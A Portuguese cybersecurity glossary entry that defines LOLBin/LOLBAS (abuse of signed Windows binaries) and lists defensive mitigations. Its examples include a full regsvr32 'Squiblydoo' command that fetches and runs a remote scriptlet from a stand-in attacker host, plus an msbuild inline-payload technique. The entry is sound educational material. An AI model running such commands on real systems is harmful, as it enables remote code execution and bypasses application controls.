LOLBin / LOLBAS
O que é LOLBin / LOLBAS?
LOLBin / LOLBASBinario ou script nativo e assinado (LOLBin/LOLBAS) que os atacantes abusam para executar codigo, descarregar payloads, persistir ou contornar controlos, parecendo uma ferramenta legitima.
O LOLBin (Living-Off-the-Land Binary) e o projeto mais amplo LOLBAS (Living-Off-the-Land Binaries And Scripts) catalogam binarios, scripts e bibliotecas assinados pela Microsoft com efeitos secundarios uteis para operacoes ofensivas, como executar codigo arbitrario, descarregar payloads remotos ou contornar controlo de aplicacoes. Exemplos comuns incluem rundll32.exe, regsvr32.exe, mshta.exe, msbuild.exe, installutil.exe e certutil.exe. Como cada ferramenta esta assinada e e confiavel, os defensores nao podem simplesmente bloquear por hash; tem de distinguir linhas de comandos esperadas de anomalas. Os LOLBAS suportam muitas tecnicas de execucao e evasao do MITRE ATT&CK. As mitigacoes baseiam-se em allow-listing de aplicacoes, logging de ScriptBlock e criacao de processos, regras ASR e analitica comportamental de EDR.
● Exemplos
- 01
regsvr32.exe /s /n /u /i:http://attacker.example/sct.sct scrobj.dll (Squiblydoo).
- 02
msbuild.exe payload.xml para executar C# inline sem tocar no disco.
● Perguntas frequentes
O que é LOLBin / LOLBAS?
Binario ou script nativo e assinado (LOLBin/LOLBAS) que os atacantes abusam para executar codigo, descarregar payloads, persistir ou contornar controlos, parecendo uma ferramenta legitima. Pertence à categoria Ataques e ameaças da cibersegurança.
O que significa LOLBin / LOLBAS?
Binario ou script nativo e assinado (LOLBin/LOLBAS) que os atacantes abusam para executar codigo, descarregar payloads, persistir ou contornar controlos, parecendo uma ferramenta legitima.
Como se defender contra LOLBin / LOLBAS?
As defesas contra LOLBin / LOLBAS costumam combinar controles técnicos e práticas operacionais, conforme detalhado na definição acima.
Quais são outros nomes para LOLBin / LOLBAS?
Nomes alternativos comuns: LOLBAS, Binario Living-off-the-Land.